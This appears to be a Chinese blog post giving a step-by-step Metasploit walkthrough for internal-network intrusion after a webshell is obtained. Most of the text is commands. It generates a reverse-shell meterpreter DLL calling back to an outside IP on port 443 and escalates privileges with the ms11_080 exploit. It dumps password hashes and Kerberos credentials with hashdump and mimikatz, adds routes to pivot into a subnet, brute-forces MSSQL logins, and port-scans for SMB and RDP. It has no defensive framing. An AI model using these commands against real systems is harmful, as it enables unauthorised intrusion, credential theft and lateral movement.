拿到webshell之后我们进行内网渗透,打开msf,我们先生成一个回连木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.71.218.172 LPORT=443 -f dll>/root/Desktop/443.dll生成木马后,我们在菜刀里放入生成的木马,运行,同时打开msf准备回连
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp
set LHOST 192.71.218.172
set lport 443
run
提权
background 或 ctrl+zuse exploit/windows/local/ms11_080_afdjoinleaf
set session 1
run
hashdump //密码获取
load mimikatz //使用mimikatz
kerberos //查看解密
新加路由查看子网
routebackground
sessions
route add 192.168.1.0 255.255.255.0 2
search mssql //找mssql模块
use auxiliary/scanner/mssql/mssql_login //使用login模块
show options
set rhosts 192.168.1.1/24
set password sa@123
run
show options
set BEUTEFORCE_SPEED 0
run
端口扫描search portscan
use auxiliary/scanner/portscan/tcp //使用scanner模块show options
set RHOSTS 192.168.177.0/24
set ports 139,445,3389 //设置扫描端口
没有评论:
发表评论